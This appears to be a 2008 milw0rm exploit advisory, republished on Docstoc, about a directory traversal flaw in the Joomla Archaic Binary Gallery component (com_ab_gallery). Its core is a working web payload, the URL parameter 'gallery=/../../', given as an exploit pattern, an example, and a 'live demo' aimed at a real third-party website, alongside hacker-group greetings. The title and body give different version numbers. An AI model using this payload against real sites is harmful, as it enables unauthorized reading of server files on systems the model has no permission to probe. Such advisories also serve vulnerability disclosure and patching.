Docstoc

Joomla Component Archaic Binary Gallery 0.2 Directory Traversal Vuln

Document Sample
Joomla Component Archaic Binary Gallery 0.2 Directory Traversal Vuln Powered By Docstoc
					                  Joomla Component Archaic Binary Gallery 0.2 Directory Traversal Vuln                             Page 1/1
  1    #############################################################################
  2    #                                                                           #
  3    # Joomla Component Archaic Binary Gallery Directory Traversal Vulnerability #
  4    #                                                                           #
  5    #############################################################################
  6
  7
  8    ########################################
  9
  10   [~]   Vulnerability found by: H!tm@N
  11   [~]   Contact: hitman[at]khg−crew[dot]ws
  12   [~]   Site: www.khg−crew.ws
  13   [~]   Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de − [−=Kosova Hackers Group=−]
  14
  15   ########################################
  16
  17   [~]   ScriptName:      "Joomla"
  18   [~]   Component:       "Archaic Binary Gallery (com_ab_gallery)"
  19   [~]   Version:         "1.0"
  20   [~]   Author:          "Zharvek"
  21   [~]   Author E−mail:   "zharvek@archaicbinary.net"
  22   [~]   Author URL:      "www.archaicbinary.net"
  23
  24   ########################################
  25
  26   [~] Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=[Directory]
  27
  28   [~] Example: /index.php?option=com_ab_gallery&Itemid=37&gallery=/../../
  29
  30   ########################################
  31
  32   [~] Live Demo: http://gsegyview.sourceforge.net/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../
  33
  34   ########################################
  35
  36   [~] Proud 2 be Albanian
  37   [~] Proud 2 be Muslim
  38   [~] United States of Albania
  39
  40   ########################################
  41
  42   # milw0rm.com [2008−10−24]




H!tm@N                                                                                                             10/24/2008

				
DOCUMENT INFO